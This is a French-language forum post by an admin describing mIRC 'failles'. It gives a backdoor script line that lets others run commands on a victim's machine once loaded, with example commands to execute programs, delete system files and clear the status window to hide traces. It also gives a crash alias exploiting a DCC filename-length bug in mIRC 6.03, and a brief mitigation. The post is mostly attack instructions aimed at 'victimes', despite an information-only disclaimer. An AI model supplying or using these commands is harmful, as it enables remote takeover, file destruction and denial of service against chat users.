NouNou_ Admin
Nombre de messages : 108 Localisation : MontreaL - NapoLi Date d'inscription : 05/03/2005
| Sujet: Failles Mirc : Dim 9 Oct à 6:50 | |
| Avec une simple ligne de code, n'importe qui peut controler votre mIRC, avec un acces complet sur votre ordinateur. Cette manipulation ou astuce est trop facile a faire , faut juste ecrire ou recevoir une ligne de code suivante :
ctcp 1:*:$1-
Une fois que quelqun aura loader l'addon on peut faire ce qu'on veut .Pour mettre cette ligne en fonction il suffit de taper :
/ctcp "pseudo" "la commande"
Comme par exemple :
/ctcp victime run C:\WINDOWS\SOL.EXE ( Pour qu'il aille jouer un peu au solitaire) /ctcp victime nick je-suis-con ( change le pseudo de la personne ) /ctcp victime remove c:\windows\system\exemple.exe ( ca efface les fichiers selectionnes! ) .....
Pour plus de commandes reportez-vous a l'aide Mirc.
Jusque la tout baigne maintenant je vais vous citez les "contraintes " :
* La victime peut voir votre IP dans la fenetre status! * La victime peut toujours deconnecter et ainsi stopper tout. * On peut tomber sur quelqun qui est doue en scripting et la ca etre votre tour de subbir les consequances :P (vous etes avertis)
Pour finir en beaute comme on dit , je vous suggere une commande trop efficace ; une commande qui efface le statut. C'est la commande: /ctcp "pseudo de la personne" clear -s
Autres Failles sous Mirc :
Faille mIRC 6.03
Grace a la commande si dessous qui est facillement ajoutable dans les aliases un utilisateurs peut faire begue un script en utilisant une faille dans la base de mIRC 6.03... sauf le mIRC 6.12. La faille est au niveau des dcc si un utilisateurs peut faire begue un script en utilisant une faille dans la base de mIRC 6.03... sauf le mIRC 6.12. La faille est au niveau des dcc si l'utilisateur en face a en attente un fichier dcc avec un nom de plus de 250 caracter ca lui fait begue ca basse mIRC.
/crash { raw PRIVMSG $1 $+(:,$chr(1),DCC) send"$+ $str($rand(a,z) $+ $chr(32),250) $+"0 2130706433 $+(8192,$chr(1)) }
La seul facon d'y remedie c'est en rajoutant ou en tapant /ignore -wd *
Rappel: Cette rubrique est faites seulement pour votre information des risques et perils de l'utilisation et si on vous g-lined, killed... ne venez pas vous plaindre aupres de moi | |
|